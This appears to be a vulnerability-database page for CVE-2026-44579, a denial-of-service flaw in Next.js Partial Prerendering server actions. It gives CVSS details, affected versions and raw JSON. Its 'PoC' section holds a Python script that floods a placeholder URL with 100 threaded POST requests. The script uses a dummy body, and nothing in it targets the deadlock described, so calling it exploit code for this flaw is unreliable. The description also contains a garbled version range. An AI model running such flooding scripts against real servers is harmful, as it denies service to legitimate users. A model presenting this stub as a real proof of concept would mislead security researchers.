Security Vulnerability Report
中文
CVE-2026-44579 CVSS 7.5 HIGH

CVE-2026-44579

Published: 2026-05-13 18:16:18
Last Modified: 2026-05-14 18:34:05
Source: [email protected]

Description

Next.js is a React framework for building full-stack web applications. From to before 15.5.16 and 16.2.5, applications using Partial Prerendering through the Cache Components feature can be vulnerable to connection exhaustion through crafted POST requests to a server action. In affected configurations, a malicious request can trigger a request-body handling deadlock that leaves connections open for an extended period, consuming file descriptors and server capacity until legitimate users are denied service. This vulnerability is fixed in 15.5.16 and 16.2.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE
Next.js < 15.5.16
Next.js < 16.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import threading import time # Target URL (Replace with actual target) target_url = "http://target-nextjs-app.com/api/action" # Send malicious request to trigger deadlock def send_attack(): try: # Sending a crafted POST request # Adjust headers/body based on specific vulnerability requirements response = requests.post(target_url, data={"key": "value"}, timeout=10) print(f"Request sent, status: {response.status_code}") except Exception as e: print(f"Error: {e}") # Launch multiple threads to exhaust connections threads = [] for i in range(100): t = threading.Thread(target=send_attack) t.start() threads.append(t) for t in threads: t.join()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44579", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:18.123", "lastModified": "2026-05-14T18:34:04.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From to before 15.5.16 and 16.2.5, applications using Partial Prerendering through the Cache Components feature can be vulnerable to connection exhaustion through crafted POST requests to a server action. In affected configurations, a malicious request can trigger a request-body handling deadlock that leaves connections open for an extended period, consuming file descriptors and server capacity until legitimate users are denied service. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "1816CFE7-5E48-40EB-8BB8-F640A1F1C3ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.